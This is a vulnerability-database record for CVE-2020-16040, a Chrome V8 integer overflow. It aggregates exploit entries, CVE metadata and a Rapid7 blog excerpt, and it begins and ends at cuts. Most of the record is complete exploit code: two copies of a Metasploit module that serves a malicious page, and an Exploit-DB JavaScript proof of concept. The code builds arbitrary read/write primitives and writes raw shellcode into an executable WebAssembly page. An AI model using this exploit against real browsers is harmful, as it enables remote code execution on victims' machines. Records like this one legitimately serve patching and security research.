dataview.setUint32(4*i, shellcode[i], true);\n }\n}\n\nvar rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));\nconsole.log(\"[+] Address of rwx page: \" + rwx_page_addr.toString(16));\nvar shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];\n/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode\ncopy_shellcode(rwx_page_addr, shellcode);\nf();\n", "sourceHref": "https://0day.today/exploit/36075", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-04T15:55:20", "description": "This Metasploit module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan. It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-09T00:00:00", "type": "zdt", "title": "Google Chrome SimplfiedLowering Integer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-09T00:00:00", "id": "1337DAY-ID-36094", "href": "https://0day.today/exploit/description/36094", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',\n 'Description' => %q{\n This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).\n The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.\n It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.\n This is abused to gain arbitrary read/write into the isolate region.\n Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Rajvardhan Agarwal (r4j)', # exploit\n ],\n 'References' => [\n ['CVE', '2020-16040'],\n ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],\n ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],\n ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],\n ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],\n ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],\n ],\n 'DisclosureDate' => '2020-11-19'\n )\n )\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n shellcode = Rex::Text.to_num(payload.encoded).gsub(/\\r\\n/, '')\n jscript = <<~JS\n var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])\n var wasm_mod = new WebAssembly.Module(wasm_code);\n var wasm_instance = new WebAssembly.Instance(wasm_mod);\n var wasm_func = wasm_instance.exports.main;\n\n var buf = new ArrayBuffer(8);\n var f64_buf = new Float64Array(buf);\n var u64_buf = new Uint32Array(buf);\n var shellcode = new Uint8Array([#{shellcode}]);\n var shellbuf = new ArrayBuffer(shellcode.length);\n var dataview = new DataView(shellbuf);\n\n function ftoi(val) {\n f64_buf[0] = val;\n return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);\n }\n\n function itof(val) {\n u64_buf[0] = Number(val & 0xffffffffn);\n u64_buf[1] = Number(val >> 32n);\n return f64_buf[0];\n }\n\n function foo(a) {\n var y = 0x7fffffff;\n\n if (a == NaN) y = NaN;\n if (a) y = -1;\n\n let z = y + 1;\n z >>= 31;\n z = 0x80000000 - Math.sign(z|1);\n\n if(a) z = 0;\n\n var arr = new Array(0-Math.sign(z));\n arr.shift();\n var cor = [1.1, 1.2, 1.3];\n\n return [arr, cor];\n }\n\n try {\n for(var i=0;i<0x3000;++i)\n foo(true);\n\n var x = foo(false);\n } catch (e) {\n location.reload();\n }\n var arr = x[0];\n var cor = x[1];\n\n const idx = 6;\n arr[idx+10] = 0x4242;\n\n function addrof(k) {\n arr[idx+1] = k;\n return ftoi(cor[0]) & 0xffffffffn;\n }\n\n function fakeobj(k) {\n cor[0] = itof(k);\n return arr[idx+1];\n }\n\n var float_array_map = ftoi(cor[3]);\n\n var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];\n var fake = fakeobj(addrof(arr2) + 0x20n);\n\n function arbread(addr) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n return ftoi(fake[0]);\n }\n\n function arbwrite(addr, val) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n fake[0] = itof(BigInt(val));\n }\n\n function copy_shellcode(addr, shellcode) {\n let buf_addr = addrof(shellbuf);\n let backing_store_addr = buf_addr + 0x14n;\n arbwrite(backing_store_addr, addr);\n\n for (let i = 0; i < shellcode.length; i++) {\n dataview.setUint8(i, shellcode[i]);\n }\n }\n\n var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);\n copy_shellcode(rwx_page_addr, shellcode);\n wasm_func();\n JS\n\n html = <<~HTML\n <html>\n <head>\n <script>\n #{jscript}\n </script>\n </head>\n <body>\n </body>\n </html>\n HTML\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36094", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2023-01-07T00:51:17", "description": "This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan. It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "cvss3": {}, "published": "2021-04-06T11:55:27", "type": "metasploit", "title": "Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16040"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_SIMPLIFIEDLOWERING_OVERFLOW-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',\n 'Description' => %q{\n This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).\n The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan.\n It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.\n This is abused to gain arbitrary read/write into the isolate region.\n Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Rajvardhan Agarwal (r4j)', # exploit\n ],\n 'References' => [\n ['CVE', '2020-16040'],\n ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],\n ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],\n ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'Space' => 4096\n },\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'Targets' => [\n ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],\n ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],\n ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],\n ],\n 'DisclosureDate' => '2020-11-19'\n )\n )\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n shellcode = Rex::Text.to_num(payload.encoded).gsub(/\\r\\n/, '')\n jscript = <<~JS\n var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])\n var wasm_mod = new WebAssembly.Module(wasm_code);\n var wasm_instance = new WebAssembly.Instance(wasm_mod);\n var wasm_func = wasm_instance.exports.main;\n\n var buf = new ArrayBuffer(8);\n var f64_buf = new Float64Array(buf);\n var u64_buf = new Uint32Array(buf);\n var shellcode = new Uint8Array([#{shellcode}]);\n var shellbuf = new ArrayBuffer(shellcode.length);\n var dataview = new DataView(shellbuf);\n\n function ftoi(val) {\n f64_buf[0] = val;\n return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);\n }\n\n function itof(val) {\n u64_buf[0] = Number(val & 0xffffffffn);\n u64_buf[1] = Number(val >> 32n);\n return f64_buf[0];\n }\n\n function foo(a) {\n var y = 0x7fffffff;\n\n if (a == NaN) y = NaN;\n if (a) y = -1;\n\n let z = y + 1;\n z >>= 31;\n z = 0x80000000 - Math.sign(z|1);\n\n if(a) z = 0;\n\n var arr = new Array(0-Math.sign(z));\n arr.shift();\n var cor = [1.1, 1.2, 1.3];\n\n return [arr, cor];\n }\n\n try {\n for(var i=0;i<0x3000;++i)\n foo(true);\n\n var x = foo(false);\n } catch (e) {\n location.reload();\n }\n var arr = x[0];\n var cor = x[1];\n\n const idx = 6;\n arr[idx+10] = 0x4242;\n\n function addrof(k) {\n arr[idx+1] = k;\n return ftoi(cor[0]) & 0xffffffffn;\n }\n\n function fakeobj(k) {\n cor[0] = itof(k);\n return arr[idx+1];\n }\n\n var float_array_map = ftoi(cor[3]);\n\n var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];\n var fake = fakeobj(addrof(arr2) + 0x20n);\n\n function arbread(addr) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n return ftoi(fake[0]);\n }\n\n function arbwrite(addr, val) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n fake[0] = itof(BigInt(val));\n }\n\n function copy_shellcode(addr, shellcode) {\n let buf_addr = addrof(shellbuf);\n let backing_store_addr = buf_addr + 0x14n;\n arbwrite(backing_store_addr, addr);\n\n for (let i = 0; i < shellcode.length; i++) {\n dataview.setUint8(i, shellcode[i]);\n }\n }\n\n var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);\n copy_shellcode(rwx_page_addr, shellcode);\n wasm_func();\n JS\n\n html = <<~HTML\n <html>\n <head>\n <script>\n #{jscript}\n </script>\n </head>\n <body>\n </body>\n </html>\n HTML\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-02-09T15:07:44", "description": "Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-01-08T19:15:00", "type": "cve", "title": "CVE-2020-16040", "cwe": ["CWE-787", "CWE-190", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-16040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}], "debiancve": [{"lastseen": "2023-03-27T06:08:22", "description": "Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-01-08T19:15:00", "type": "debiancve", "title": "CVE-2020-16040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-01-08T19:15:00", "id": "DEBIANCVE:CVE-2020-16040", "href": "https://security-tracker.debian.org/tracker/CVE-2020-16040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:47:31", "description": "chromium, sid is vulnerable to remote code execution (RCE). It is possible due to an insufficient data validation flaw found in the V8 component of the Chromium browser.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-12-21T18:51:48", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-12T23:24:01", "id": "VERACODE:28692", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28692/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:05:10", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-06T00:00:00", "type": "exploitdb", "title": "Google Chrome 86.0.4240 V8 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-16040", "CVE-2020-16040"], "modified": "2021-04-06T00:00:00", "id": "EDB-ID:49745", "href": "https://www.exploit-db.com/exploits/49745", "sourceData": "# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution\r\n# Exploit Author: r4j0x00\r\n# Version: < 87.0.4280.88\r\n# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\r\n# CVE: CVE-2020-16040\r\n\r\n/*\r\nBSD 2-Clause License\r\n\r\nCopyright (c) 2021, rajvardhan agarwal\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without\r\nmodification, are permitted provided that the following conditions are met:\r\n\r\n1. Redistributions of source code must retain the above copyright notice, this\r\n list of conditions and the following disclaimer.\r\n\r\n2. Redistributions in binary form must reproduce the above copyright notice,\r\n this list of conditions and the following disclaimer in the documentation\r\n and/or other materials provided with the distribution.\r\n\r\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\r\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\r\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\r\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\r\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\r\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\r\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\r\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n*/\r\n\r\n// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/\r\n\r\nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])\r\nvar wasm_mod = new WebAssembly.Module(wasm_code);\r\nvar wasm_instance = new WebAssembly.Instance(wasm_mod);\r\nvar f = wasm_instance.exports.main;\r\n\r\nvar buf = new ArrayBuffer(8);\r\nvar f64_buf = new Float64Array(buf);\r\nvar u64_buf = new Uint32Array(buf);\r\nlet buf2 = new ArrayBuffer(0x150);\r\n\r\nfunction ftoi(val) {\r\n f64_buf[0] = val;\r\n return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);\r\n}\r\n\r\nfunction itof(val) {\r\n u64_buf[0] = Number(val & 0xffffffffn);\r\n u64_buf[1] = Number(val >> 32n);\r\n return f64_buf[0];\r\n}\r\n\r\nfunction foo(a) {\r\n var y = 0x7fffffff;\r\n\r\n if (a == NaN) y = NaN;\r\n if (a) y = -1;\r\n\r\n let z = y + 1;\r\n z >>= 31;\r\n z = 0x80000000 - Math.sign(z|1);\r\n\r\n if(a) z = 0;\r\n\r\n var arr = new Array(0-Math.sign(z));\r\n arr.shift();\r\n var cor = [1.1, 1.2, 1.3];\r\n\r\n return [arr, cor];\r\n}\r\n\r\nfor(var i=0;i<0x3000;++i)\r\n foo(true);\r\n\r\nvar x = foo(false);\r\nvar arr = x[0];\r\nvar cor = x[1];\r\n\r\nconst idx = 6;\r\narr[idx+10] = 0x4242;\r\n\r\nfunction addrof(k) {\r\n arr[idx+1] = k;\r\n return ftoi(cor[0]) & 0xffffffffn;\r\n}\r\n\r\nfunction fakeobj(k) {\r\n cor[0] = itof(k);\r\n return arr[idx+1];\r\n}\r\n\r\nvar float_array_map = ftoi(cor[3]);\r\n\r\nvar arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];\r\nvar fake = fakeobj(addrof(arr2) + 0x20n);\r\n\r\nfunction arbread(addr) {\r\n if (addr % 2n == 0) {\r\n addr += 1n;\r\n }\r\n arr2[1] = itof((2n << 32n) + addr - 8n);\r\n return (fake[0]);\r\n}\r\n\r\nfunction arbwrite(addr, val) {\r\n if (addr % 2n == 0) {\r\n addr += 1n;\r\n }\r\n arr2[1] = itof((2n << 32n) + addr - 8n);\r\n fake[0] = itof(BigInt(val));\r\n}\r\n\r\nfunction copy_shellcode(addr, shellcode) {\r\n let dataview = new DataView(buf2);\r\n let buf_addr = addrof(buf2);\r\n let backing_store_addr = buf_addr + 0x14n;\r\n arbwrite(backing_store_addr, addr);\r\n\r\n for (let i = 0; i < shellcode.length; i++) {\r\n dataview.setUint32(4*i, shellcode[i], true);\r\n }\r\n}\r\n\r\nvar rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));\r\nconsole.log(\"[+] Address of rwx page: \" + rwx_page_addr.toString(16));\r\nvar shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];\r\n/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode\r\ncopy_shellcode(rwx_page_addr, shellcode);\r\nf();", "sourceHref": "https://www.exploit-db.com/download/49745", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "rapid7blog": [{"lastseen": "2021-04-16T18:50:57", "description": "## Google Chrome exploits return\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/04/metasploit-blg-2-small-1.png)\n\nCommunity member `r4j0x00` contributed a new module for [CVE-2020-16040](<https://attackerkb.com/topics/XiXhz3J5Fi/cve-2020-16040?referrer=blog>), an integer overflow in the SimplifiedLowering phase of TurboFan in Google Chrome <= 87.0.4280.66 that grants attackers RCE. Whilst the exploit in and of itself does not grant RCE by default, unless the sandbox is disabled, it is still important to note that some embedded versions of Chrome run without the sandbox enabled by default in order to allow Chrome access to more system resources. This means that in some cases it may still be possible to use this module on its own to gain RCE on a system.\n\n## Simplifying Metasploit shell verification - Round 2\n\nAs part of his continuous updates to make Metasploit sessions easier to verify, our very own `zeroSteiner`, updated several Meterpreter libraries to ensure that error messages output when commands cannot be run in a given Meterpreter session are now more intuitive and better explain what is going wrong, such as if a library has not yet been loaded. `zeroSteiner` also updated these libraries to allow Metasploit to proactively identify when a command will fail in a Meterpreter session due to it not being supported by whatever type of Metepreter session is running on the remote target. This should help users to better identify what commands are not supported by a given session and also better debug things themselves if anything goes wrong, as part of our ongoing work to better improve session validation and make it more intuitive.\n\n## Reading the OS from Haserl's perspective\n\nCommunity members Ike Broflovski and Julien Voisin added in a new post module that takes advantage of [CVE-2021-29133](<https://attackerkb.com/topics/wrdNpI10DS/cve-2021-29133?referrer=blog>) , an arbitrary read in haserl prior to 0.9.36, that allows attackers to read any file on the target file system without requiring any specific privileges. It\u2019s important to note that in many cases attackers are often blocked from escalating their privileges due to a lack of access to some important bit of information. The ability to read arbitrary files on disk can help to lower this barrier by allowing attackers to access protected files that may contain things such as saved application credentials, source code for various sensitive components, or even just information about applications running on the system itself that may assist in identifying ways to elevate permissions, making this an incredibly versatile module should one manage to find a vulnerable target.\n\n## New modules (3)\n\n * [Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection](<https://github.com/rapid7/metasploit-framework/pull/14700>) by Erik Wynter and Haboob Team, which exploits CVE-2020-35578 - A new module has been added to exploit 